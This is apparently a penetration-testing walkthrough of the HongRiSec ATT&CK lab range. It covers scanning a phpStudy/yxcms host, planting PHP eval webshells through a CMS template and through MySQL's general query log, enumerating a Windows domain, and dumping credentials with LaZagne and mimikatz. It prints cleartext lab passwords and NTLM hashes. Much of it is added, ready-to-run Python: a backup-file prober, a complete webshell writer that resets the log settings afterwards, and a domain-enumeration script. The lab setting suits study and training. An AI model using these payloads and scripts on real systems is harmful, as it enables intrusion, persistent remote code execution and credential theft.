Note: this series works through the 红日安全 (HongRiSec) ATT&CK lab range (1).
It is a fairly long read; please be patient.
Topics covered in this part
I. Environment setup: 1. Lab setup  2. Information gathering
II. Exploitation: 3. Vulnerability search and exploitation  4. Back-end getshell upload tricks  5. System information gathering  6. Host credential harvesting
I. Environment setup
Set the VMnet2 adapter to the 192.168.52.0 network
Set the VMnet1 adapter to the 192.168.33.0 network
Network topology diagram
Initial foothold: nmap scan
root@kepler:~/桌面# nmap -sV -Pn 192.168.33.5 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 14:30 CST
Stats: 0:02:55 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 78.85% done; ETC: 14:33 (0:00:32 remaining)
Stats: 0:03:42 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.89% done; ETC: 14:33 (0:00:02 remaining)
Nmap scan report for 192.168.33.5
Host is up (0.00045s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.33.5
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.33.5:80/
| Form id:
| Form action: /l.php#bottom
|
| Path: http://192.168.33.5:80/l.php
| Form id:
|_ Form action: /l.php#bottom
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /phpinfo.php: Possible information file
| /phpmyadmin/: phpMyAdmin
| /phpMyAdmin/: phpMyAdmin
|_ /PHPMyAdmin/: phpMyAdmin
| http-phpself-xss:
| VULNERABLE:
| Unsafe use of $_SERVER["PHP_SELF"] in PHP files
| State: VULNERABLE (Exploitable)
| PHP files are not handling safely the variable $_SERVER["PHP_SELF"] causing Reflected Cross Site Scripting vulnerabilities.
|
| Extra information:
|
| Vulnerable files with proof of concept:
| http://192.168.33.5/l.php/'"/>
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.33.5
| References:
| http://php.net/manual/en/reserved.variables.server.php
|_ https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-sql-injection:
| Possible sqli for queries:
| http://192.168.33.5:80/l.php?act=Function' OR sqlspider
| http://192.168.33.5:80/l.php?act=phpinfo' OR sqlspider
| http://192.168.33.5:80/l.php?act=Function' OR sqlspider
| http://192.168.33.5:80/l.php?act=phpinfo' OR sqlspider
| http://192.168.33.5:80/l.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000' OR sqlspider
| http://192.168.33.5:80/l.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42' OR sqlspider
| http://192.168.33.5:80/l.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42' OR sqlspider
| Possible sqli for forms:
| Form at path: /, form's action: /l.php#bottom. Fields that might be vulnerable:
| host
| port
| login
| funName
| Form at path: /l.php, form's action: /l.php#bottom. Fields that might be vulnerable:
| host
| port
| login
|_ funName
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
3306/tcp open mysql MySQL (unauthorized)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:D7:7E:A2 (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 250.55 seconds
On the PHP probe page (l.php) nmap reports a reflected XSS through the unsanitised $_SERVER["PHP_SELF"]:
http://192.168.33.5/l.php/'"/>
Directory scan
The directory scan turns up a backup archive, beifen.rar.
Unpacking it yields the yxcms source, so try that path on the target:
curl -i http://192.168.33.5/yxcms/
The page reveals the admin back-end path together with the account name and password.
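The directory scan step above, scripted as an added example (this is not the author's tooling): it probes a web root for common backup-archive names and the well-known paths nmap already enumerated, using a soft-404 baseline so servers that answer 200 for everything do not produce false hits. BASE is the lab host from the nmap scan; the candidate name list is a small generic one, not the wordlist the author used. The HTTP fetch is injectable so the logic can be exercised offline.

```python
"""Probe a web root for exposed backup archives and well-known paths: the
step that turned up beifen.rar above, scripted.

Added example, not from the original write-up. BASE is the lab host from the
nmap scan; BACKUP_NAMES/ARCHIVE_EXTS are a small generic list, not the
wordlist the author used. Everything goes through `fetch`, which is
injectable so the logic can be exercised offline.
"""
import urllib.error
import urllib.request

BASE = "http://192.168.33.5"
BACKUP_NAMES = ["beifen", "backup", "bak", "www", "web", "wwwroot", "site"]
ARCHIVE_EXTS = [".rar", ".zip", ".7z", ".tar.gz", ".sql"]
KNOWN_PATHS = ["phpmyadmin/", "phpinfo.php", "l.php", "yxcms/", "robots.txt"]


def candidates():
    """Backup-name x extension products first, then the well-known paths."""
    return [n + e for n in BACKUP_NAMES for e in ARCHIVE_EXTS] + KNOWN_PATHS


def http_status(url, timeout=5):
    """HEAD the URL and return (status, content_length). HTTP errors are
    returned as their status; connection failures give (None, 0)."""
    req = urllib.request.Request(url, method="HEAD")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, int(resp.headers.get("Content-Length") or 0)
    except urllib.error.HTTPError as e:
        return e.code, 0
    except (urllib.error.URLError, OSError):
        return None, 0


def probe(base=BASE, fetch=http_status):
    """Return [(path, status, size)] for hits. A request for a name that
    cannot exist gives the soft-404 baseline: if the server answers 200 for
    it, only 200s with a different size count as real. 403 on a directory is
    still a hit (it exists, listing is just denied)."""
    base = base.rstrip("/")
    base_status, base_size = fetch(base + "/zz-no-such-path-8f3a1c.txt")
    hits = []
    for path in candidates():
        status, size = fetch(base + "/" + path)
        if status == 200 and not (base_status == 200 and size == base_size):
            hits.append((path, status, size))
        elif status == 403 and path.endswith("/"):
            hits.append((path, status, size))
    return hits


if __name__ == "__main__":
    for hit in probe():
        print("%-16s %s %d bytes" % hit)
```

Run it against the lab host and beifen.rar shows up with its size; a 403 on phpmyadmin/ confirms the directory exists even though Apache refuses to list it.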
II. Exploitation
Back-end GetShell
Logged into the yxcms back end successfully.
Add a one-line PHP webshell to a template in the template manager, then connect with AntSword (蚁剑).
Connected successfully.
Writing a webshell through MySQL
select '<?php eval($_POST[a]);?>' INTO OUTFILE 'C:/phpStudy/WWW/aa.php';
This fails because secure_file_priv is in effect.
Check its value: it is NULL, which disables INTO OUTFILE and LOAD_FILE entirely (an empty string would mean no restriction; a directory would restrict file I/O to that directory).
show global variables like '%secure%';
show variables like '%general%'; ------ check the general query log settings
The general query log is not governed by secure_file_priv, so redirect it into the web root instead. SET GLOBAL needs the SUPER privilege, and the MySQL service account must be able to create files in the web root.
set global general_log=on; ------ enable the log
set global general_log_file='C:/phpStudy/WWW/web1.php'; ------ point the log file into the web root
select '<?php @eval($_POST["aaa"]);?>'; ------ the query text is written verbatim into web1.php; PHP ignores the log's other lines outside the tag
Then connect with AntSword.
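The general_log route above as one complete, added example (not code from the original write-up): it checks secure_file_priv, saves the current general_log settings, writes the shell, and puts the log back so the file in the web root does not keep growing. Assumed, not from the page: the MySQL credentials you pass in, that the account has SUPER (required for SET GLOBAL), and that mysqld can create files under C:/phpStudy/WWW (the path the write-up uses). The live part needs the pymysql package; the planning helpers run without it.

```python
"""Write a PHP webshell through MySQL's general query log when secure_file_priv
blocks INTO OUTFILE.

Added example, not part of the original write-up. Assumptions: MySQL on the
target (3306 open per the nmap scan) accepts the credentials you pass in, the
account has SUPER (needed for SET GLOBAL), and mysqld can create files under
WEBROOT (phpStudy's default path from the write-up). The live part needs the
pymysql package; the planning helpers run without it.
"""

WEBROOT = "C:/phpStudy/WWW"
PARAM = "aaa"   # POST parameter the shell evaluates; any name works


def php_payload(param=PARAM):
    """One-line eval shell. Double quotes inside so it can sit in a
    single-quoted SQL literal without escaping."""
    return '<?php @eval($_POST["%s"]);?>' % param


def sql_string(s):
    """Quote s as a MySQL single-quoted literal (backslashes and quotes doubled)."""
    return "'" + s.replace("\\", "\\\\").replace("'", "''") + "'"


def describe_secure_file_priv(value):
    """NULL disables INTO OUTFILE / LOAD_FILE entirely, '' allows any path,
    a directory restricts file I/O to that directory. The general log is not
    governed by this variable at all, which is the whole trick. SHOW VARIABLES
    may render the NULL as SQL NULL or as the string 'NULL' depending on version."""
    if value is None or value == "NULL":
        return "outfile disabled (NULL): use the general_log route"
    if value == "":
        return "outfile allowed anywhere"
    return "outfile restricted to " + value


def plan_statements(log_path, param=PARAM):
    """Statement sequence: redirect the log into the web root, make the server
    log a query whose text is the PHP payload, then stop logging. The log file
    also contains header lines and the SET statements; PHP ignores everything
    outside the <?php ... ?> tag."""
    return [
        "SET GLOBAL general_log = 'ON'",
        "SET GLOBAL general_log_file = " + sql_string(log_path),
        "SELECT " + sql_string(php_payload(param)),
        "SET GLOBAL general_log = 'OFF'",
    ]


def write_shell(host, user, password, webroot=WEBROOT, name="web1.php"):
    """Live path. Restores the original general_log settings afterwards so the
    log does not keep growing inside the web root. Returns the shell URL."""
    import pymysql   # local import so the pure helpers above work without it
    conn = pymysql.connect(host=host, user=user, password=password)
    try:
        with conn.cursor() as cur:
            cur.execute("SHOW GLOBAL VARIABLES LIKE 'secure_file_priv'")
            row = cur.fetchone()
            print(describe_secure_file_priv(row[1] if row else None))
            cur.execute("SHOW GLOBAL VARIABLES LIKE 'general_log%'")
            saved = dict(cur.fetchall())   # {'general_log': 'OFF', 'general_log_file': '...'}
            for stmt in plan_statements(webroot + "/" + name):
                cur.execute(stmt)
            cur.execute("SET GLOBAL general_log_file = %s", (saved["general_log_file"],))
            cur.execute("SET GLOBAL general_log = %s", (saved["general_log"],))
    finally:
        conn.close()
    return "http://%s/%s" % (host, name)
```

Call write_shell("192.168.33.5", "<user>", "<password>") and then point AntSword at the returned URL with the POST parameter aaa. If SET GLOBAL fails with "Access denied; you need the SUPER privilege", the MySQL account is not privileged enough and this route is closed.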
III. Internal network information gathering
Check current privileges
whoami && whoami /priv
Check the IP configuration
ipconfig /all
The primary DNS suffix in this output shows the host is domain-joined.
Check system information
systeminfo
Check network connections
netstat -ano
List installed applications
wmic product get name,version
List processes
tasklist /v
net start ------ list the running services
Some processes were started by the domain administrator, so their tokens can be stolen (token impersonation).
Check saved remote-connection credentials
cmdkey /l
Check for anti-virus products
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
The SecurityCenter2 namespace exists only on client editions of Windows; on Windows Server this returns nothing, so look for AV processes in the tasklist output instead.
Check logged-on users
quser
Check the password policy
net accounts ------ local password policy
net accounts /domain ------ domain password policy
Check the OS version
wmic OS get Caption,CSDVersion,OSArchitecture,Version
Check local administrators
net localgroup administrators
net localgroup administrators /domain ------ the domain's built-in Administrators group (queried on the DC, not the local machine)
Check which domain the host is logged into
net config workstation
List domain users
net user /domain
List the Domain Admins group
net group "domain admins" /domain
List the domain controllers
net group "domain controllers" /domain
List the domain computers
net group "domain computers" /domain
Resolve the domain controller's IP
ping -a owa.god.org
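The enumeration above is normally typed command by command; as an added example (not the author's script), here is the same run wrapped so the interesting targets are parsed out of the raw output: the domain name from ipconfig /all, and the member lists from net group / net localgroup, which are what the next steps (resolving the DC, picking lateral-movement targets) need. The SAMPLE_* strings are constructed to match the real layout of those commands' output and use only the lab's names (god.org, OWA, stu1); the command runner is injectable so the parsers work off Windows too.

```python
"""Run the host/domain enumeration commands above and parse out the targets.

Added example, not from the original post. The SAMPLE_* strings are constructed
to match the real layout of `net group`, `net localgroup` and `ipconfig /all`
output, using the lab's names (god.org, OWA, stu1); nothing else is assumed.
"""
import platform
import subprocess

# Commands from the write-up, in the order a practitioner runs them.
RECON_COMMANDS = [
    "whoami /all", "ipconfig /all", "systeminfo", "net config workstation",
    "net user /domain", 'net group "domain admins" /domain',
    'net group "domain controllers" /domain', 'net group "domain computers" /domain',
    "net localgroup administrators", "cmdkey /l", "quser", "net accounts /domain",
]


def run_cmd(cmd):
    """Run one command via cmd.exe. Returns '' off Windows so the parsers can
    still be exercised on sample output."""
    if platform.system() != "Windows":
        return ""
    proc = subprocess.run(cmd, shell=True, capture_output=True)
    return proc.stdout.decode("oem", errors="replace")   # cmd.exe writes the OEM code page


def parse_net_group(output):
    """Member names from `net group` / `net localgroup` output: they follow the
    dashed rule, up to three per line in fixed-width columns. A name containing
    a space would be split; sAMAccountNames rarely do."""
    members, in_members = [], False
    for line in output.splitlines():
        if line.startswith("----"):
            in_members = True
        elif in_members:
            if line.startswith("The command completed"):
                break
            members.extend(line.split())
    return members


def parse_domain(ipconfig_output):
    """Primary Dns Suffix from ipconfig /all; None when the host is not
    domain-joined (the line is then empty after the colon)."""
    for line in ipconfig_output.splitlines():
        if "Primary Dns Suffix" in line:
            return line.split(":", 1)[1].strip() or None
    return None


def enumerate_domain(run=run_cmd):
    """Collect the pieces the write-up gathers by hand; `run` is injectable."""
    return {
        "domain": parse_domain(run("ipconfig /all")),
        "dcs": parse_net_group(run('net group "domain controllers" /domain')),
        "domain_admins": parse_net_group(run('net group "domain admins" /domain')),
        "computers": parse_net_group(run('net group "domain computers" /domain')),
        "local_admins": parse_net_group(run("net localgroup administrators")),
        "raw": {c: run(c) for c in RECON_COMMANDS},   # keep everything for the report
    }


# Constructed samples in the real output layout.
SAMPLE_DC_GROUP = """Group name     Domain Controllers
Comment        All domain controllers in the domain

Members

-------------------------------------------------------------------------------
OWA$
The command completed successfully.
"""
SAMPLE_ADMINS = """Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator
The command completed successfully.
"""
SAMPLE_IPCONFIG = """Windows IP Configuration

   Host Name . . . . . . . . . . . . : stu1
   Primary Dns Suffix  . . . . . . . : god.org
   Node Type . . . . . . . . . . . . : Hybrid
"""

if __name__ == "__main__":
    print(parse_domain(SAMPLE_IPCONFIG), parse_net_group(SAMPLE_DC_GROUP))
    if platform.system() == "Windows":
        print(enumerate_domain())
```

Names ending in $ in the member lists are computer accounts, so "dcs" gives you the DC hostname (OWA) to resolve with ping, and "domain_admins" gives the accounts whose processes and tokens are worth looking for in tasklist /v.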
Harvesting credentials
There are several ways to get credentials off the local machine:
read them from the registry, dump them from memory, or pull saved passwords from browsers, VPN clients and configuration files.
Upload LaZagne
lazagne.exe all
It first returns the NTLM hash values,
then the browser and VPN passwords.
Reading credentials with mimikatz:
privilege::debug
sekurlsa::logonpasswords
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 1957949 (00000000:001de03d)
Session : Interactive from 1
User Name : Administrator
Domain : GOD
Logon Server : OWA
Logon Time : 2020/5/14 21:42:51
SID : S-1-5-21-2952760202-1353902439-2381784089-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : GOD
* NTLM : 85c1491a3c765c7ae64f73dd12b2c005
* SHA1 : b94ef91fcca7e093910779ddb25cd7189b330037
tspkg :
* Username : Administrator
* Domain : GOD
* Password : hongrisec@2019:
wdigest :
* Username : Administrator
* Domain : GOD
* Password : hongrisec@2019:
kerberos :
* Username : Administrator
* Domain : GOD.ORG
* Password : hongrisec@2019:
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2020/5/14 21:34:40
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : STU1$
Domain : GOD
Logon Server : (null)
Logon Time : 2020/5/14 21:34:39
SID : S-1-5-20
msv :
[00000003] Primary
* Username : STU1$
* Domain : GOD
* NTLM : 31f4fed3bf6b625f10c3e98486edf58a
* SHA1 : 21f629c16524d1bb00e8af538dd5d44a2bfe97dc
tspkg :
wdigest :
* Username : STU1$
* Domain : GOD
* Password : 6c 20 79 c9 3c 4c f9 5f a1 85 63 94 cd 33 0d 35 e3 9e ee ab 89 7d 58 b1 51 4d f6 db cd 1b e5 42 ea 2d f4 29 30 8f ea fe 05 78 cc ed ad 54 a0 44 68 ef d6 31 30 73 2d 91 9f e6 11 9a be a2 6b 3c ac 81 21 6e 7b f6 5b da ae bc a1 4a 73 50 6a 28 9e 2b d7 8c cf 8c 8e 68 b0 11 2d d0 e3 5f 21 48 26 4b d1 e1 f8 4f 24 2a 04 ff 8a 08 46 31 a2 f8 a0 76 9e 0c 45 a8 ec 6b d0 4a 4b 87 ab 26 a0 25 d2 15 72 2a 0e 42 af e1 2f a8 f2 fc 30 cd 71 ad ae 7a 11 a7 27 0a 33 ea 2b 11 dd 02 ab f6 8b bd b2 2b 77 72 22 89 3e dd f2 75 6c 0a 40 3b b1 17 6f 5d ee 2c 96 f5 2e 2d 90 61 05 8a d1 73 37 e8 8a dc 01 7a 8f f4 2f 2c dc 3b eb 22 68 df 21 34 87 0e aa 5a 0e d4 47 92 c6 17 5e 28 15 90 5e 21 17 31 ed 44 36 4e dc e9 55 2f fc 30 e7 d6 df 70
kerberos :
* Username : stu1$
* Domain : GOD.ORG
* Password : 6c 20 79 c9 3c 4c f9 5f a1 85 63 94 cd 33 0d 35 e3 9e ee ab 89 7d 58 b1 51 4d f6 db cd 1b e5 42 ea 2d f4 29 30 8f ea fe 05 78 cc ed ad 54 a0 44 68 ef d6 31 30 73 2d 91 9f e6 11 9a be a2 6b 3c ac 81 21 6e 7b f6 5b da ae bc a1 4a 73 50 6a 28 9e 2b d7 8c cf 8c 8e 68 b0 11 2d d0 e3 5f 21 48 26 4b d1 e1 f8 4f 24 2a 04 ff 8a 08 46 31 a2 f8 a0 76 9e 0c 45 a8 ec 6b d0 4a 4b 87 ab 26 a0 25 d2 15 72 2a 0e 42 af e1 2f a8 f2 fc 30 cd 71 ad ae 7a 11 a7 27 0a 33 ea 2b 11 dd 02 ab f6 8b bd b2 2b 77 72 22 89 3e dd f2 75 6c 0a 40 3b b1 17 6f 5d ee 2c 96 f5 2e 2d 90 61 05 8a d1 73 37 e8 8a dc 01 7a 8f f4 2f 2c dc 3b eb 22 68 df 21 34 87 0e aa 5a 0e d4 47 92 c6 17 5e 28 15 90 5e 21 17 31 ed 44 36 4e dc e9 55 2f fc 30 e7 d6 df 70
ssp :
credman :
Authentication Id : 0 ; 52651 (00000000:0000cdab)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2020/5/14 21:34:39
SID :
msv :
[00000003] Primary
* Username : STU1$
* Domain : GOD
* NTLM : 31f4fed3bf6b625f10c3e98486edf58a
* SHA1 : 21f629c16524d1bb00e8af538dd5d44a2bfe97dc
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : STU1$
Domain : GOD
Logon Server : (null)
Logon Time : 2020/5/14 21:34:39
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : STU1$
* Domain : GOD
* Password : 6c 20 79 c9 3c 4c f9 5f a1 85 63 94 cd 33 0d 35 e3 9e ee ab 89 7d 58 b1 51 4d f6 db cd 1b e5 42 ea 2d f4 29 30 8f ea fe 05 78 cc ed ad 54 a0 44 68 ef d6 31 30 73 2d 91 9f e6 11 9a be a2 6b 3c ac 81 21 6e 7b f6 5b da ae bc a1 4a 73 50 6a 28 9e 2b d7 8c cf 8c 8e 68 b0 11 2d d0 e3 5f 21 48 26 4b d1 e1 f8 4f 24 2a 04 ff 8a 08 46 31 a2 f8 a0 76 9e 0c 45 a8 ec 6b d0 4a 4b 87 ab 26 a0 25 d2 15 72 2a 0e 42 af e1 2f a8 f2 fc 30 cd 71 ad ae 7a 11 a7 27 0a 33 ea 2b 11 dd 02 ab f6 8b bd b2 2b 77 72 22 89 3e dd f2 75 6c 0a 40 3b b1 17 6f 5d ee 2c 96 f5 2e 2d 90 61 05 8a d1 73 37 e8 8a dc 01 7a 8f f4 2f 2c dc 3b eb 22 68 df 21 34 87 0e aa 5a 0e d4 47 92 c6 17 5e 28 15 90 5e 21 17 31 ed 44 36 4e dc e9 55 2f fc 30 e7 d6 df 70
kerberos :
* Username : stu1$
* Domain : GOD.ORG
* Password : 6c 20 79 c9 3c 4c f9 5f a1 85 63 94 cd 33 0d 35 e3 9e ee ab 89 7d 58 b1 51 4d f6 db cd 1b e5 42 ea 2d f4 29 30 8f ea fe 05 78 cc ed ad 54 a0 44 68 ef d6 31 30 73 2d 91 9f e6 11 9a be a2 6b 3c ac 81 21 6e 7b f6 5b da ae bc a1 4a 73 50 6a 28 9e 2b d7 8c cf 8c 8e 68 b0 11 2d d0 e3 5f 21 48 26 4b d1 e1 f8 4f 24 2a 04 ff 8a 08 46 31 a2 f8 a0 76 9e 0c 45 a8 ec 6b d0 4a 4b 87 ab 26 a0 25 d2 15 72 2a 0e 42 af e1 2f a8 f2 fc 30 cd 71 ad ae 7a 11 a7 27 0a 33 ea 2b 11 dd 02 ab f6 8b bd b2 2b 77 72 22 89 3e dd f2 75 6c 0a 40 3b b1 17 6f 5d ee 2c 96 f5 2e 2d 90 61 05 8a d1 73 37 e8 8a dc 01 7a 8f f4 2f 2c dc 3b eb 22 68 df 21 34 87 0e aa 5a 0e d4 47 92 c6 17 5e 28 15 90 5e 21 17 31 ed 44 36 4e dc e9 55 2f fc 30 e7 d6 df 70
ssp :
credman :
With the local host enumerated (the hex-dump "passwords" shown for STU1$ are the computer account's random machine password, not something a person can type; the Administrator entries give both the NTLM hash and the cleartext), the next step is lateral movement.
See the next part:
由浅入深的域渗透系列一(下) (Domain Penetration Step by Step, Series 1, Part 2)